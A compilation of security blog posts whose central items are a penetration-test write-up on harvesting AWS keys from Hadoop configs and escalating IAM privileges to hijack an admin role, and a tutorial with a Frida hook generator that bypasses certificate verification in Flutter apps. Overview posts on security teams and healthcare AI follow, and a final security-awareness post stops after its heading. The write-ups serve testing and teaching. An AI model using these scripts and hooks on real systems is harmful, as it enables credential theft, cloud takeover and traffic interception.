Jimm Wayans
Red Team, Blue Team, and Purple Team

Red Team, Blue Team, and Purple Team: Understanding the Roles in Cybersecurity


Red, Blue, and Purple Teams are terms often used in the context of cybersecurity and information security to describe different roles and approaches in testing and improving the security of an organization’s systems and networks. Here’s an overview of each team and their respective roles:

  1. Red Team:
    • Role: The Red Team represents the attackers or adversaries. Their primary role is to simulate cyberattacks on an organization’s systems, networks, and infrastructure to identify vulnerabilities and weaknesses.
    • Activities:
      • Conduct penetration testing to exploit vulnerabilities.
      • Use hacking techniques to breach defenses.
      • Mimic real-world attack scenarios.
      • Test the organization’s incident response capabilities.
      • Provide a comprehensive report on findings and recommendations for improvement.
    • Goal: To identify weaknesses in the organization’s security posture, which can help the organization proactively improve its defenses and response capabilities.
    • Benefits: Red Team exercises help organizations identify vulnerabilities and gaps in their security measures that may not be apparent through traditional security assessments.
  2. Blue Team:
    • Role: The Blue Team represents the organization’s defenders. Their primary role is to protect the organization’s systems, networks, and data from cyber threats and to detect and respond to security incidents.
    • Activities:
      • Monitor and analyze network traffic and system logs.
      • Implement and manage security controls and tools.
      • Develop and maintain incident response procedures.
      • Investigate and respond to security incidents.
      • Continuously assess and improve security measures.
    • Goal: To maintain a strong and resilient security posture, detect and respond to threats in real-time, and minimize the impact of security incidents.
    • Benefits: Blue Team activities are crucial for day-to-day security operations, threat detection, and incident response, helping organizations defend against cyber threats.
  3. Purple Team:
    • Role: The Purple Team is a collaborative effort that combines elements of both the Red Team and Blue Team. Its role is to improve communication and cooperation between these teams.
    • Activities:
      • Conduct controlled exercises with Red Team and Blue Team members working together.
      • Share information about vulnerabilities, attack techniques, and defensive measures.
      • Test and refine incident response procedures in real-time.
      • Collaboratively assess and improve security controls.
    • Goal: To enhance the overall security posture of the organization by fostering collaboration between offensive (Red) and defensive (Blue) teams.
    • Benefits: Purple Team exercises promote a more holistic and coordinated approach to cybersecurity. They ensure that Red and Blue Teams work together to address vulnerabilities and threats effectively.

In summary, Red Teams simulate cyberattacks to uncover vulnerabilities, Blue Teams defend against threats and respond to incidents, and Purple Teams facilitate collaboration between the two to enhance an organization’s overall security posture. These teams play essential roles in proactive security testing, incident response, and continuous improvement in the ever-evolving field of cybersecurity.

#cybersecurity #redteam #redteaming #blueteam #purpleteam #InfoSec #cyberdefense


Leveraging AWS IAM Permissions for Complete Cloud Takeover: An Actual Case Study

Part 1 – AWS Security

Introduction: In this real-world case study, we look at enumerating AWS IAM permissions and putting them to strategic use. I strongly recommend reading my prior article on the intricacies of IAM permissions first, despite its length, as it is the foundation for the tactics used here. To keep the focus on the more intricate parts of the exploitation, we will not dwell on the simpler vulnerabilities we encountered (some of which were covered in a separate writeup).

Throughout this study, we will explore the manual process of enumerating IAM policies and roles, as well as explore automated tools designed for this purpose, all while emphasizing the importance of not placing absolute trust in automation. Additionally, we will provide a brief tutorial on using “jq.”

Initiating Network Access: My initial point of entry into the network was discovered through a Nessus scan of a publicly accessible AWS endpoint. This scan revealed the presence of an exposed, unauthenticated ResourceManager service within a Hadoop instance. If you recall, this vulnerability was previously discussed in my writeup on Hadoop and MCollective exploitation, and it can be readily exploited using Metasploit to achieve Remote Code Execution (RCE).

Having successfully compromised this instance and swiftly establishing a couple of backdoors to ensure continued access, I commenced network scanning. Eventually, I identified a master Hadoop node with a service exposed on port 9298, accessible via an internal interface within the subnet.

I confirmed that it hosted configuration files for Hadoop and proceeded to download all the files for analysis. In AWS environments, one of the most valuable discoveries you can make is AWS access keys and secret keys, which can be located using the regular expressions provided here: https://gist.github.com/hsuh/88360eeadb0e8f7136c37fd46a62ee10

AWS provides three methods for accessing resources:

  1. Through the web console
  2. Through the command line interface (CLI)
  3. Through the APIs (directly or via the SDKs)

To use the CLI you need an access key ID, a secret access key and, for temporary credentials, a session token. Access key IDs are 20 characters long and start with AKIA (long-term IAM user keys) or ASIA (temporary STS keys, which only work together with their session token); secret keys are 40 characters long. Candidates for each can be found with the following regular expressions:

grep -RP '(?<![A-Z0-9])[A-Z0-9]{20}(?![A-Z0-9])' *
grep -RP '(?<![A-Za-z0-9/+=])[A-Za-z0-9/+=]{40}(?![A-Za-z0-9/+=])' *

After obtaining all the necessary files, I conducted a search and located a match in a file called “core-site.xml.”
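As an added example (not code from the write-up), here is a small Python scanner that applies those two regular expressions to a downloaded configuration tree, classifies access-key candidates by prefix (AKIA long-term, ASIA temporary) and drops 40-character hex strings, which are SHA-1 digests rather than secret keys. The core-site.xml it runs on is constructed for this example and uses AWS's documentation example key pair; fs.s3a.access.key and fs.s3a.secret.key are real Hadoop property names.

```python
"""Scan downloaded files for AWS access-key / secret-key candidates.

Added example, not from the write-up. It applies the two regexes quoted above
and adds two checks: the access-key prefix (AKIA = long-term IAM user key,
ASIA = temporary STS key that also needs a session token) and a filter for
40-character hex strings, which are SHA-1 digests rather than secret keys.
"""
import os
import re
from typing import List, NamedTuple, Tuple

ACCESS_KEY_RE = re.compile(r"(?<![A-Z0-9])[A-Z0-9]{20}(?![A-Z0-9])")
SECRET_KEY_RE = re.compile(r"(?<![A-Za-z0-9/+=])[A-Za-z0-9/+=]{40}(?![A-Za-z0-9/+=])")
HEX40_RE = re.compile(r"^[0-9a-fA-F]{40}$")

KEY_PREFIXES = {
    "AKIA": "long-term IAM user key",
    "ASIA": "temporary STS key (a session token is needed as well)",
}


class Finding(NamedTuple):
    kind: str   # "access_key" or "secret_key"
    value: str
    line: int   # 1-based line number within the scanned text
    note: str


def scan_text(text: str) -> List[Finding]:
    """Return every access-key and secret-key candidate in `text`, in line order."""
    findings: List[Finding] = []
    for line_no, line in enumerate(text.splitlines(), 1):
        for tok in ACCESS_KEY_RE.findall(line):
            note = KEY_PREFIXES.get(tok[:4], "unknown prefix, probably not an AWS key")
            findings.append(Finding("access_key", tok, line_no, note))
        for tok in SECRET_KEY_RE.findall(line):
            if HEX40_RE.match(tok):
                continue  # a bare SHA-1, the classic false positive for this regex
            findings.append(Finding("secret_key", tok, line_no, "40-char base64-like token"))
    return findings


def pair_credentials(findings: List[Finding], max_distance: int = 20) -> List[Tuple[str, str]]:
    """Pair each secret with the nearest AKIA/ASIA access key within `max_distance` lines."""
    keys = [f for f in findings if f.kind == "access_key" and f.value[:4] in KEY_PREFIXES]
    pairs = []
    for secret in (f for f in findings if f.kind == "secret_key"):
        near = [k for k in keys if abs(k.line - secret.line) <= max_distance]
        if near:
            best = min(near, key=lambda k: abs(k.line - secret.line))
            pairs.append((best.value, secret.value))
    return pairs


def scan_tree(root: str) -> List[Tuple[str, Finding]]:
    """Walk `root` (e.g. the downloaded Hadoop config directory) and scan every file as text."""
    hits = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                with open(path, "r", encoding="utf-8", errors="ignore") as fh:
                    hits.extend((path, f) for f in scan_text(fh.read()))
            except OSError:
                continue
    return hits


# Constructed sample standing in for the core-site.xml found on the master node. The key
# pair is AWS's documentation example; the hadoop.tmp.dir value carries a SHA-1 to show
# the hex filter at work.
SAMPLE_CORE_SITE = """<configuration>
  <property><name>fs.s3a.access.key</name><value>AKIAIOSFODNN7EXAMPLE</value></property>
  <property><name>fs.s3a.secret.key</name><value>wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY</value></property>
  <property><name>fs.defaultFS</name><value>hdfs://master:9000</value></property>
  <property><name>hadoop.tmp.dir</name><value>/tmp/hadoop-da39a3ee5e6b4b0d3255bfef95601890afd80709</value></property>
</configuration>
"""

if __name__ == "__main__":
    for f in scan_text(SAMPLE_CORE_SITE):
        print(f"line {f.line}: {f.kind} {f.value} ({f.note})")
    print("pairs:", pair_credentials(scan_text(SAMPLE_CORE_SITE)))
```

Run it against the directory you pulled from the node with scan_tree("./hadoop-conf"); anything the prefix check labels as unknown is usually an ID of some other kind and can be skipped, and an ASIA key without its session token nearby is not usable on its own.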

Next, I employed the tool “enumerate-iam.py” to perform a brute-force analysis of the permissions available to that account.


I observed that the account had the ability to list S3 buckets but did not appear to possess admin privileges. To conduct a quick privilege escalation check, I used RhinoSecurityLab’s “aws_escalate.py,” a tool I previously mentioned in my article on IAM permissions.


Unfortunately, it appeared that the account did not even have iam:GetUser. However, there were still other avenues to explore. Let’s return to the S3 route.

Pivoting for Access: We needed to configure a profile with the obtained credentials and initiate enumeration.

aws configure --profile test
aws --profile test s3 ls


There were approximately 180 buckets. We began reading them with:

aws --profile test s3 ls s3://backup-db-logs


This also presented a challenge: the account could list the buckets (s3:ListAllMyBuckets) but not list their contents (s3:ListBucket is granted per bucket). To identify the buckets we could read, various tools were available, but we preferred to write our own script for better control over the process:

#!/usr/bin/env bash
# enumerateReadBuckets.sh: list every bucket the profile can see, then keep the ones it can actually list.
# Usage: bash enumerateReadBuckets.sh --profile test
profile=""
while [ $# -gt 0 ]; do
    if [ "$1" = "--profile" ] && [ -n "$2" ]; then
        profile="$2"
        shift
    fi
    shift
done
[ -n "$profile" ] || { echo "usage: $0 --profile NAME" >&2; exit 1; }

echo "Enumerating the buckets..."
# "s3 ls" prints "<date> <time> <name>"; keep only the name
aws --profile "$profile" s3 ls | awk '{print $3}' > /tmp/buckets
: > /tmp/readBuckets
echo "You can read the following buckets:"
while read -r bucket; do
    # Check the exit status rather than the output: an empty bucket prints nothing
    # but is still readable, while AccessDenied goes to stderr only.
    if aws --profile "$profile" s3 ls "s3://$bucket" >/dev/null 2>&1 </dev/null; then
        echo "$bucket" | tee -a /tmp/readBuckets
    fi
done < /tmp/buckets


Invoke the script using:

bash enumerateReadBuckets.sh --profile test


We only had access to four buckets, which was a modest result. Let’s begin syncing all the information for local analysis.

for i in $(cat /tmp/readBuckets); do aws --profile test s3 sync "s3://$i" "./$i"; done

However, this did not return as expected. While we weren’t certain about the issue at that moment, this situation is not uncommon during penetration testing, so we proceeded with manual enumeration.

We started with our first bucket, which we’ll refer to as “bucket1.”

aws --profile test s3 ls s3://bucket1

We found a “conf” directory, which seemed promising.

aws --profile test s3 ls s3://bucket1/conf/

Wait, wasn’t “core-site.xml” the first file we discovered? Let’s download it and search for credentials.

aws --profile test s3 cp s3://bucket1/conf/hadoop/core-site.xml .


Excellent! We found new credentials. Let’s create a new profile to use them.

aws configure --profile test2


Now, let’s perform a brute-force analysis of our permissions:

./aws_escalate.py --access-key-id AKID --secret-key SK

This new account appears to have significantly more permissions than our initial one. Let’s try again, supplying a user name:

./aws_escalate.py --access-key-id AKID --secret-key SK --user-name USER

Unfortunately, we still did not have an admin account.


Now, this is where a reasonably proficient knowledge of the AWS CLI becomes advantageous. The “aws_escalate” script relies on the “GetUser” operation to retrieve information about the current user, and the “test2” account lacks iam:GetUser. Fortunately, there are other ways to learn which identity you are operating under. One is the Security Token Service, whose get-caller-identity call requires no IAM permission at all:

aws --profile test2 sts get-caller-identity


Now that we’ve identified the user, we can specify it manually:

./aws_escalate.py --access-key-id AKID --secret-key SK --user-name USER


The script might indicate that no methods are possible due to the user’s lack of permissions to execute the methods it uses. However, we were able to manually escalate privileges with this user. Let’s explore how.

Next, we need to find the ideal role to impersonate. If you recall the permissions associated with our “test2” user, many of them were related to EC2. Referring back to Rhino’s excellent blog post, we can see that method 3 actually involves using EC2:

Description: An attacker with the iam:PassRole and ec2:RunInstances permissions can create a new EC2 instance and assign an existing EC2 instance profile/service role to it. They can then log in to the instance and retrieve the associated AWS keys from the EC2 instance metadata, granting access to all the permissions associated with the assigned instance profile/service role.

Before we proceed, it’s essential to clarify that while a script is an efficient way to enumerate information, it usually cannot guarantee with 100% certainty whether privilege escalation is possible. This is because:

  1. Most privilege escalations depend on multiple factors, not all of which are straightforward to correlate.
  2. Amazon’s permissions are highly granular, meaning you might have permissions for certain actions (e.g., listing buckets) but not for others (e.g., reading the contents of those buckets).

Consider the method mentioned above. Having PassRole and RunInstances privileges alone isn’t sufficient. You also need to identify which role to impersonate and establish a connection with the instance, which might require pre-existing SSH keys or other methods. Additionally, it depends on the instance’s security group configurations. Enumerating security groups is essential to determine which one to assign to the instance or if you have privileges to create new ones.
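As an added example of that correlation problem (not the author’s tooling, nor Rhino’s), the Python below checks a set of policy documents you have already retrieved against a list of required actions, handling the three things a quick grep misses: “*” and “?” wildcards in Action, NotAction, and an explicit Deny overriding an Allow. It ignores Resource and Condition on purpose, so an empty “missing” list means the method is worth attempting, not that it will work. The policy set embedded below is constructed to resemble the test2 user.

```python
"""Check which of a set of IAM actions a principal's policies might grant.

Added example, not from the write-up or from Rhino's tooling. It evaluates policy
documents you have already pulled (inline and attached managed policies) against
required actions, handling Action wildcards, NotAction, and explicit Deny. Resource
and Condition are deliberately ignored, so a hit means "worth trying", not "guaranteed".
"""
import fnmatch
from typing import Iterable, List


def _as_list(value):
    return value if isinstance(value, list) else [value]


def _matches(pattern: str, action: str) -> bool:
    # IAM action matching is case-insensitive; '*' and '?' are the only wildcards.
    return fnmatch.fnmatchcase(action.lower(), pattern.lower())


def statement_covers(stmt: dict, action: str) -> bool:
    """Does this statement's Action/NotAction element address `action` at all?"""
    if "Action" in stmt:
        return any(_matches(p, action) for p in _as_list(stmt["Action"]))
    if "NotAction" in stmt:
        return not any(_matches(p, action) for p in _as_list(stmt["NotAction"]))
    return False


def policy_allows(docs: Iterable[dict], action: str) -> bool:
    """True if some statement allows `action` and no statement explicitly denies it."""
    allowed = denied = False
    for doc in docs:
        for stmt in _as_list(doc.get("Statement", [])):
            if not statement_covers(stmt, action):
                continue
            if stmt.get("Effect") == "Allow":
                allowed = True
            elif stmt.get("Effect") == "Deny":
                denied = True
    return allowed and not denied


def missing_actions(docs: Iterable[dict], required: Iterable[str]) -> List[str]:
    """Which of `required` are not (even possibly) granted by `docs`."""
    docs = list(docs)
    return [a for a in required if not policy_allows(docs, a)]


# What Rhino's "method 3" needs; the caveats above (which role, SSH access, security
# groups) still apply even when this comes back empty.
EC2_PASSROLE_METHOD = ["iam:PassRole", "ec2:RunInstances"]

# Constructed policy set resembling the test2 user: broad EC2 rights, role listing,
# PassRole, and an explicit Deny that would explain why get-role and get-user failed.
SAMPLE_TEST2_POLICIES = [
    {"Version": "2012-10-17", "Statement": [
        {"Effect": "Allow", "Resource": "*",
         "Action": ["ec2:*", "iam:ListRoles", "iam:ListAttachedRolePolicies",
                    "iam:ListRolePolicies", "iam:PassRole", "s3:ListAllMyBuckets"]},
        {"Effect": "Deny", "Action": "iam:Get*", "Resource": "*"},
    ]},
]

if __name__ == "__main__":
    print("missing for EC2/PassRole:", missing_actions(SAMPLE_TEST2_POLICIES, EC2_PASSROLE_METHOD))
    for act in ("iam:GetRole", "iam:CreateUser", "ec2:RunInstances"):
        print(f"{act}: {policy_allows(SAMPLE_TEST2_POLICIES, act)}")
```

Feed it the PolicyDocument objects from aws iam get-user-policy (inline) and aws iam get-policy-version (managed); reading those requires iam:GetUserPolicy and iam:GetPolicyVersion, and where they are denied, as get-role was for test2, the only input you have is the list of calls that enumerate-iam confirmed, which you can wrap in a single Allow statement to get the same answer.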

However, granular permissions offer more opportunities than initially apparent, as we’ll explore further.

Now, the first step is to find a role suitable for hijacking. Let’s check if we can enumerate roles using:

aws --profile PROFILE iam list-roles | head -n 10


Great! We have list-roles privileges. Now, there are two criteria we need for identifying a suitable role for hijacking:

  1. The role should have an Administrator policy or a similar highly privileged policy attached.
  2. The role’s trust policy should include Amazon’s EC2 service to allow instances to assume the role.

For the first criterion, we can list the associated managed policies with:

aws --profile PROFILE iam list-attached-role-policies --role-name ROLE

We can also list the inline policies with:

aws --profile PROFILE iam list-role-policies --role-name ROLE

Let’s attempt this with the “Administrators” role as an example:

aws --profile PROFILE iam list-attached-role-policies --role-name Administrators

Great! Now, let’s try to retrieve the trust relationship document (the assume role policy) to see which entities can assume this role. We can do this with:

aws --profile PROFILE iam get-role --role-name ROLE

This command should provide the output containing trust relationship information if your account has the necessary permissions. However, in the case of the “test2” account, this information isn’t accessible.

(Screenshot: the output you should get if your account has permissions)

(Screenshot: the output we got with the test2 account)

But remember what we discussed about granular permissions? There are often multiple ways to obtain the same information. Here the user could not call get-role but could call list-roles. Amazon’s documentation describes that call as listing the roles with the specified path prefix and returning an empty list if there are none, which undersells it: --path-prefix is optional and defaults to a slash (“/”), so omitting it returns every role in the account, and each entry includes the role’s AssumeRolePolicyDocument. For our purpose that replaces get-role entirely (the CLI pages through the full result set for you). Anyway, let’s give it a try:

aws --profile PROFILE iam list-roles


Great! Now, we need a way to list the roles that have an assume role policy with AWS EC2 as a trustee. To filter these roles, we’ll use jq, a tool for parsing JSON output. To explain how to use it, let’s break it down step by step. First, let’s examine the structure we need to parse. Let’s consider one role from the output:


The information we need is listed under “Principal,” and it should look something like:

"Principal": {
    "Service": "ec2.amazonaws.com"
}

Let’s select only the fields we’re interested in with:

aws --profile test2 iam list-roles | jq -r '.Roles[] | .RoleName, .AssumeRolePolicyDocument.Statement[].Principal.Service'

This command will filter for the RoleName and the Principal Service.


However, the output may not match the example we provided earlier because not all results will look exactly the same. Some might involve a different Principal, such as a Federated Principal:

This complexity makes parsing the output a bit harder, but not impossible. Let’s filter only the elements where “Principal.Service” is not null:

aws --profile test2 iam list-roles | jq -r '.Roles[] | select(.AssumeRolePolicyDocument.Statement[].Principal.Service != null) | .RoleName, .AssumeRolePolicyDocument.Statement[].Principal.Service'

We’re getting closer. Now, let’s refine the results:

aws --profile test2 iam list-roles | jq -r '.Roles[] | select(.AssumeRolePolicyDocument.Statement[].Principal.Service != null) | .RoleName, .AssumeRolePolicyDocument.Statement[].Principal.Service' | grep -B 1 "ec2.amazonaws.com" | grep -v -e "ec2.amazonaws.com" -e '^--$' | sort -u

This command retrieves every role whose trust policy names a service principal, printing the role name followed by the service. grep -B 1 keeps each “ec2.amazonaws.com” line together with the line before it (the role name); the second grep drops the service lines and the “--” group separators that grep inserts; sort -u removes duplicates. If a trust policy lists several services, jq -r prints them as a JSON array on one line, which the grep still matches.


Now, we have identified potential candidates for instance role hijacking. The next step is to get the associated policies for each candidate using list-attached-role-policies and list-role-policies, as mentioned earlier. After a few minutes, we find a role with an Administrator policy attached. For the sake of illustration, let’s call it “danger-role.” It’s quite evocative and reminds me of “danger-zone,” which I appreciate as an Archer fan.
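The same selection done offline in Python, as an added example rather than the write-up’s own pipeline, so that the principal shapes that trip up the jq one-liner are handled explicitly: Service as a string or a list, Federated and AWS principals, a Statement that is an object instead of a list, and Deny statements. It takes the JSON that aws iam list-roles prints (the CLI already decodes AssumeRolePolicyDocument into an object) and returns the names of the roles whose trust policy lets ec2.amazonaws.com call sts:AssumeRole; checking each candidate with list-attached-role-policies and list-role-policies, as described above, is still a separate step. The list-roles output embedded below is constructed.

```python
"""Pick out roles whose trust policy lets the EC2 service assume them.

Added example, not from the write-up. Does offline what the jq pipeline does, but
handles Principal.Service as a string or a list, skips Federated/AWS principals,
accepts Statement as an object or a list, and ignores Deny statements.
Input: the JSON printed by `aws iam list-roles`.
"""
import json
import sys
from typing import List

EC2_SERVICE = "ec2.amazonaws.com"


def _as_list(value):
    return value if isinstance(value, list) else [value]


def trusted_services(stmt: dict) -> List[str]:
    """Service principals named by an Allow statement that grants sts:AssumeRole."""
    if stmt.get("Effect") != "Allow":
        return []
    actions = [a.lower() for a in _as_list(stmt.get("Action", []))]
    if not any(a in ("sts:assumerole", "sts:*", "*") for a in actions):
        return []
    principal = stmt.get("Principal")
    if not isinstance(principal, dict):   # "*" or missing: no service principal here
        return []
    return [s.lower() for s in _as_list(principal.get("Service", []))]


def ec2_assumable_roles(list_roles_output: dict) -> List[str]:
    """Sorted names of roles an EC2 instance profile could carry."""
    names = set()
    for role in list_roles_output.get("Roles", []):
        doc = role.get("AssumeRolePolicyDocument") or {}
        for stmt in _as_list(doc.get("Statement", [])):
            if EC2_SERVICE in trusted_services(stmt):
                names.add(role["RoleName"])
    return sorted(names)


# Constructed list-roles output covering the cases above (account ID is AWS's example one).
SAMPLE_LIST_ROLES = json.loads("""{"Roles": [
  {"RoleName": "danger-role", "AssumeRolePolicyDocument": {"Version": "2012-10-17", "Statement": [
     {"Effect": "Allow", "Principal": {"Service": "ec2.amazonaws.com"}, "Action": "sts:AssumeRole"}]}},
  {"RoleName": "multi-service", "AssumeRolePolicyDocument": {"Statement":
     {"Effect": "Allow", "Principal": {"Service": ["ecs-tasks.amazonaws.com", "ec2.amazonaws.com"]}, "Action": ["sts:AssumeRole"]}}},
  {"RoleName": "lambda-role", "AssumeRolePolicyDocument": {"Statement": [
     {"Effect": "Allow", "Principal": {"Service": "lambda.amazonaws.com"}, "Action": "sts:AssumeRole"}]}},
  {"RoleName": "saml-role", "AssumeRolePolicyDocument": {"Statement": [
     {"Effect": "Allow", "Principal": {"Federated": "arn:aws:iam::123456789012:saml-provider/corp"}, "Action": "sts:AssumeRoleWithSAML"}]}},
  {"RoleName": "deny-ec2", "AssumeRolePolicyDocument": {"Statement": [
     {"Effect": "Deny", "Principal": {"Service": "ec2.amazonaws.com"}, "Action": "sts:AssumeRole"}]}}
]}""")

if __name__ == "__main__":
    # Usage: aws --profile test2 iam list-roles | python3 ec2_roles.py
    data = json.load(sys.stdin) if not sys.stdin.isatty() else SAMPLE_LIST_ROLES
    for name in ec2_assumable_roles(data):
        print(name)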


 #aws #awssecurity #webapsecurity #cloudsecurity

End of part 1, part 2 coming soon…

Bypassing Root CA Checks in Android Apps Built with Flutter

Android App Security:

In this post, I will explore the topic of bypassing Root Certificate Authority (CA) checks in Android applications developed using the Flutter framework. Although it is important to note that bypassing these security measures is generally not recommended, I aim to provide insights into the technical aspects for educational purposes only.

Understanding Root CA Checks:
Root CA checks are a fundamental security measure: when an Android application opens an SSL/TLS connection, it validates that the server’s certificate chains to a trusted CA and has not been tampered with. Bypassing these checks lets you put an intercepting proxy such as Burp Suite in the middle of the connection.

Limitations in Flutter:
Flutter is a cross-platform framework, but its Dart networking stack (dart:io) does not go through the platform’s HTTP and TLS APIs. On Android that means the usual hooks (the system and user CA stores, the network security configuration and the device proxy settings) do not apply, so the tricks that defeat certificate checks in a native app do not work here; you have to deal with the engine itself.

Recently, I delved into Android applications developed with the Flutter framework, which was new territory for me. During a discussion unrelated to app testing, I stumbled upon an app to analyze. Excited about the opportunity, I launched the app on my phone, connected it to a testing WiFi network, fired up Burp Suite, and soon encountered a familiar challenge faced by app testers.

Wonderful! They’re doing something right by preventing Burp’s root CA from being used, and I could probably bypass this with Frida. I pulled the .apk apart and found…


After a bit of reading about the Flutter engine, it seems the majority of the work is performed by “libflutter.so”. This became more apparent after starting “frida-trace” and setting up intercept scripts for all the usual SSL methods you’d need to bypass: although the libraries were loaded, I didn’t see a single call to any of those methods, and the SSL connection still failed to start.

So I dug further. Flutter bundles BoringSSL into “libflutter.so” and performs its own certificate verification rather than trusting the OS, against a fixed set of root certificates compiled into the engine. That explains why none of the system SSL methods were ever called and why I couldn’t MITM the connection: the user CA store, where Burp’s certificate lives, is never consulted. Because the library is stripped, logcat output turned out to be the quickest way into the verification code.

Breaking out Ghidra and loading the shared object wasn’t much better as the library had been stripped of symbols, making it tough to find the verification functions. I fired up the app again and watched the output of logcat to see if it gave me any clues:


See the line containing “handshake.cc”? After some trawling through strings and references in Ghidra I found some methods that contained it:


The 0x160 seems to correspond to the line number in the source that generates the error, so I grabbed the BoringSSL code and started looking for X.509 verification functions. One cropped up in “ssl_x509.cc”:


Searching Ghidra for this file name showed up the full path string as expected, tracing cross-references to that string dumped me in the middle of a call to “FUN_00316500” above with a line number value that roughly matched the source file. Bingo!

To get this check to pass all I’d have to do would be:

      1. Calculate the actual address of the function in the phones memory
      2. Build a Frida Interceptor script to trap it
      3. Alter the return value to “true”

The offset of the function can be calculated by finding the virtual address of a function whose name we know, working out the target function’s distance from it in Ghidra, and then adding that distance to the actual address of the known function in the running process.

The Flutter shared object exports one function, “JNI_OnLoad”, which the Android runtime calls during startup. Frida can find its address easily, so it makes a good base function to start from. The offset of the X509 function from it could be calculated and added to the base address; setting up an interception on the result showed repeated calls to the method whenever I forced the app to make a request:


See how the “ret” value is “0x0”? Lets patch that out:


Problem solved!
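Steps 1 to 3 in Python, as an added example rather than the author’s actual script. The rebase arithmetic is the point: Ghidra shows libflutter.so at a static image base and the running process at a randomised one, and since JNI_OnLoad and the target live in the same ELF, target_runtime = JNI_OnLoad_runtime + (target_static − JNI_OnLoad_static); the shift between the static and runtime JNI_OnLoad must be page aligned, which is a cheap check that you are hooking the right build. The static JNI_OnLoad address and the runtime addresses are placeholders, 0x316500 is FUN_00316500 from the write-up. The Frida script it emits resolves JNI_OnLoad at runtime, applies the delta and forces the verification function to return 1, which assumes the function returns an int/bool, as the 0x0 in the trace suggests.

```python
"""Rebase a Ghidra address onto the running process and emit the Frida hook.

Added example, not the author's script. Because JNI_OnLoad and the target function
sit in the same ELF, target_runtime = anchor_runtime + (target_static - anchor_static).
The load shift of a shared object is always page aligned, so a misaligned shift means
the wrong anchor symbol or the wrong libflutter.so build.
"""
PAGE = 0x1000


def rebase(static_target: int, static_anchor: int, runtime_anchor: int) -> int:
    """Translate a static (Ghidra) address to its address in the live process."""
    shift = runtime_anchor - static_anchor
    if shift % PAGE:
        raise ValueError(f"load shift {shift:#x} is not page aligned: "
                         "wrong anchor symbol or wrong libflutter.so build")
    return static_target + shift


def frida_hook(static_target: int, static_anchor: int,
               lib: str = "libflutter.so", anchor: str = "JNI_OnLoad") -> str:
    """Frida script that resolves the anchor export at runtime, applies the static
    delta, logs each call and forces the verification function to return 1."""
    delta = static_target - static_anchor
    op = "add" if delta >= 0 else "sub"
    return f"""
var anchor = Module.findExportByName("{lib}", "{anchor}");
if (anchor === null) throw new Error("{lib} not loaded yet; attach after the library has loaded");
var target = anchor.{op}({abs(delta):#x});
console.log("[+] {anchor} @ " + anchor + ", verify_cert_chain @ " + target);
Interceptor.attach(target, {{
    onLeave: function (retval) {{
        console.log("[*] verify_cert_chain returned " + retval + ", forcing 1");
        retval.replace(0x1);  // assumes an int/bool return, matching the 0x0 seen in the trace
    }}
}});
"""


if __name__ == "__main__":
    # Placeholder values: JNI_OnLoad at 0x280000 in Ghidra, 0x7a1c280000 in the live process.
    print("runtime target:", hex(rebase(0x316500, 0x280000, 0x7a1c280000)))
    print(frida_hook(0x316500, 0x280000))
```

Save the printed script as hook.js and attach once libflutter.so is mapped, for example frida -U -p <pid> -l hook.js; the hook logs the original return value on every call so you can confirm you are on the right function before relying on the patch. The delta is computed from the Ghidra listing only, so the script does not need to know the runtime base in advance.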


This was definitely a much harder one to crack than most apps. I expect people will hide behind that as a form of “security” and forget to secure the APIs the app talks to 🙂

I grabbed a few more Flutter apps and checked the MD5 hashes of their “libflutter.so” files; they differ in most cases, which means the offset of “ssl_crypto_x509_session_verify_cert_chain” has to be calculated for each app. I’m not sure whether that can be automated given the lack of debug symbols, but honestly it’s not much of a problem when testing a single app.

#FlutterApp #Androidsecurity #Applicationsecurity #infosec


Application of AI, Machine Learning and Data Analytics in Healthcare.


The combination of AI, machine learning, and data analytics provides researchers and scientists with powerful tools to process and interpret large volumes of complex healthcare data. Here’s how these technologies work together:


  1. Data Processing and Integration: AI, machine learning, and data analytics techniques can handle large volumes of healthcare data, including patient records, genetic information, medical images, and research articles. These technologies can process and integrate diverse data sources, ensuring that relevant information is captured and organized for analysis.
  2. Pattern Recognition and Data Mining: Machine learning algorithms can identify patterns, trends, and correlations within the data. By training the algorithms on a vast amount of healthcare data, they learn to recognize complex relationships and indicators that may be difficult for humans to detect. This enables researchers to uncover valuable insights and potential associations between variables.
  3. Feature Extraction and Selection: Machine learning algorithms can automatically extract relevant features from healthcare data. For example, in genetic data, algorithms can identify specific gene variants or mutations that may be associated with rare diseases. Feature selection techniques help researchers identify the most informative and predictive features for accurate diagnostics or research purposes.
  4. Predictive Modeling and Decision Support: Machine learning models can be developed to predict outcomes, such as disease diagnoses or treatment responses, based on the available data. These models can assist researchers and clinicians in making informed decisions by providing evidence-based recommendations or predictions. This decision support can aid in early diagnosis, personalized treatment planning, and improving patient outcomes.
  5. Data Visualization and Interpretation: AI and data analytics tools offer visualization techniques that facilitate the interpretation of complex healthcare data. Graphs, charts, and interactive dashboards can present the data in a visually meaningful way, enabling researchers to understand trends, relationships, and anomalies more easily. Visual representations can help communicate findings and support data-driven decision-making.
  6. Continuous Learning and Improvement: AI and machine learning algorithms have the ability to continuously learn and adapt. As researchers incorporate new data and insights, the algorithms can update their models and refine their predictions. This iterative learning process improves the accuracy and effectiveness of the analyses over time, enabling researchers to uncover new knowledge and refine their understanding of rare diseases.

By leveraging AI, machine learning, and data analytics, researchers and scientists can effectively process, integrate, and interpret large volumes of complex healthcare data. These technologies enable them to discover meaningful patterns, make predictions, gain valuable insights, and support evidence-based decision-making in the field of rare disease diagnosis and research.

Talking about Information Security Awareness

Information Security Awareness

Today, with the rapid development of new-generation information technologies such as artificial intelligence and big data, daily life has become more convenient and faster. While we enjoy this technological life, we often do not realize that we are exposed to dangers such as information fraud, information harvesting and information harassment. Compared with traditional fraud, today’s criminals exploit the efficiency of technology and network security loopholes, which makes them even harder to guard against. A small oversight in daily life may lead to personal information leakage and create information security risks.


Information technology has changed how people work, study and live, making them more dependent on computer networks. While enjoying the conveniences it brings, people often lack information security awareness and neglect information security safeguards. Such awareness is built up gradually through knowledge and understanding of information security. This post discusses the meaning of information security awareness and the current state of information security development, and proposes effective measures to strengthen that awareness.

The importance of information security

